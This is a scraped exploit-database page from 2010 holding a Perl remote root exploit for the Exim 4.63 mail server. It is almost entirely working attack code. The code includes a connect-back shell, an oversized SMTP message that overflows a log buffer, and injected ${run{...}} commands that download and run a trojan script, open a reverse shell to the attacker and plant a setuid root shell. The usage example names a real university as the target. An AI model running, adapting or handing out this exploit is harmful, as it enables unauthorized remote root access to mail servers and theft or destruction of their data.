[remote exploits] - Exim 4.63 Remote Exploit
Posted on 11 December 2010
"https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>======================== Exim 4.63 Remote Exploit ======================== #Exim 4.63 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope #Modified perl version of metasploit module =for comment use this connect back shell as "trojanurl" and be sure to setup a netcat, ---snip--- $system = '/bin/sh'; $ARGC=@ARGV; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] "; die "Ex: $0 127.0.0.1 2121 "; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host "; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host "; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); open FILE, ">/var/spool/exim4/s.c"; print FILE qq{ #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { setuid(0); setgid(0); setgroups(0, NULL); execl("/bin/sh", "sh", NULL); } }; close FILE; system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c"); open FILE, ">/tmp/e.conf"; print FILE "spool_directory = ${run{/bin/chown root:root /var/spool/exim4/s}}${run{/bin/chmod 4755 /var/spool/exim4/s}}"; close FILE; system("exim -C/tmp/e.conf -q; rm /tmp/e.conf"); system("uname -a;"); system("/var/spool/exim4/s"); system($system); ---snip--- =cut use IO::Socket; if ($#ARGV ne 3) { print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport> "; print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443 "; exit; } $|=1; $trojan = $ARGV[1]; $myip = $ARGV[2]; $myport = $ARGV[3]; $helohost = "abcde.com"; $max_msg = 52428800; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "25", Proto => 'tcp'); while(<$sock>) { print; if ($_ =~ /220 /) { last;} } print $sock "EHLO $helohost "; while(<$sock>) { print; 
if ($_ =~ /250-SIZE (d+)/) { $max_msg = $1; print "Set size to $max_msg ! "; } if ($_ =~ /^250.*Hello ([^s]+) [([^]]+)]/) { $revdns = $1; $saddr = $2; } if ($_ =~ /250 /) { last;} } if ($revdns eq $helohost) { $vv = ""; } else { $vv = $revdns. " "; } $vv .= "(" . $helohost . ")"; $from = "root@local.com"; $to = "postmaster@localhost"; $msg_len = $max_msg + 1024*256; $logbuffer_size = 8192; $logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg "; $logbuffer .= "Envelope-from: <$from> Envelope-to: <$to> "; $filler = "V" x (8 * 16); $logbuffer_size -= 3; for ($k=0;$k<60;$k++) { if (length($logbuffer) >= $logbuffer_size) {last;} $hdr = sprintf("Header%04d: %s ", $k, $filler); $newlen = length($logbuffer) + length($hdr); if ($newlen > $logbuffer_size) { $newlen -= $logbuffer_size; $off = length($hdr) - $newlen - 2 - 1; $hdr = substr($hdr, 0, $off); $hdr .= " "; } $hdrs .= $hdr; $logbuffer .= " " . $hdr; } $hdrx = "HeaderX: "; $k2 = 3; for ($k=1;$k<=200;$k++) { if ($k2 > 12) { $k2 = 3; } # $hdrx .= "${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} "; $hdrx .= "${run{/bin/sh -c "exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'"}} "; $k2++; } $v = "A" x 255 . " "; $body = ""; while (length($body) < $msg_len) { $body .= $v; } $body = substr($body, 0, $msg_len); print $sock "MAIL FROM: <$from> "; $v = <$sock>; print $v; print $sock "RCPT TO: <$to> "; $v = <$sock>; print $v; print $sock "DATA "; $v = <$sock>; print $v; print "Sending large buffer, please wait... "; print $sock $hdrs; print $sock $hdrx . " "; print $sock $body; print $sock " . "; $v = <$sock>; print $v; print $sock "MAIL FROM: <$from> "; $v = <$sock>; print $v; print $sock "RCPT TO: <$to> "; while(1){}; # <a href='http://1337db.com/'>1337db.com</a> [2010-12-11]</pre></body></html>